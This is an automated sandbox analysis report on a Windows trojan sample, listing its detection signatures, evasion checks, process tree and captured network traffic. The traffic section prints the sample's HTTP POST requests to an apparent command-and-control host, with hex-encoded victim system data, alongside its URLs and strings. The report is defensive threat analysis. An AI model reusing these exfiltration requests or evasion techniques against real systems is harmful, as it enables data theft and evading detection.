Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
j6Nv9kUydV.exe

Overview

General Information

Sample name:j6Nv9kUydV.exe
renamed because original name is a hash value
Original sample name:84e0e622857460da96501532a233c862.exe
Analysis ID:1578975
MD5:84e0e622857460da96501532a233c862
SHA1:a83b246ef32b7a66a8cbbc54edd3bb667f956b9b
SHA256:0924a04e22be1339356c24b69b2e75516c56b0b23aa500e9068b9c28c54dd5b9
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • j6Nv9kUydV.exe (PID: 8120 cmdline: "C:\Users\user\Desktop\j6Nv9kUydV.exe" MD5: 84E0E622857460DA96501532A233C862)
    • WerFault.exe (PID: 4880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: j6Nv9kUydV.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: j6Nv9kUydV.exeReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: j6Nv9kUydV.exeJoe Sandbox ML: detected
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ad892dbe-f
Source: j6Nv9kUydV.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 442929Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 34 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 442929Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 34 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 442929Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 34 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5vt.top
Source: unknownHTTP traffic detected: POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1Host: home.fivetk5vt.topAccept: */*Content-Type: application/jsonContent-Length: 442929Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 31 34 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ17
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000002.1740716394.000000000184E000.00000004.00000020.00020000.00000000.sdmp, j6Nv9kUydV.exe, 00000000.00000002.1740716394.00000000018AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
Source: j6Nv9kUydV.exe, 00000000.00000002.1740716394.000000000184E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ173451474535a1
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtO
Source: j6Nv9kUydV.exe, 00000000.00000002.1740716394.000000000184E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745lse
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

System Summary

barindex
PE file contains section with special chars
Source: j6Nv9kUydV.exeStatic PE information: section name:
Source: j6Nv9kUydV.exeStatic PE information: section name: .idata
Source: j6Nv9kUydV.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 1144
Source: j6Nv9kUydV.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: j6Nv9kUydV.exeStatic PE information: Section: zqcjcxyz ZLIB complexity 0.9944025632999444
Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8120
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\cb3c52ec-c800-4012-b4d4-68c6d5d79963Jump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: j6Nv9kUydV.exeReversingLabs: Detection: 65%
Source: j6Nv9kUydV.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\j6Nv9kUydV.exe "C:\Users\user\Desktop\j6Nv9kUydV.exe"
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8120 -s 1144
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSection loaded: mswsock.dllJump to behavior
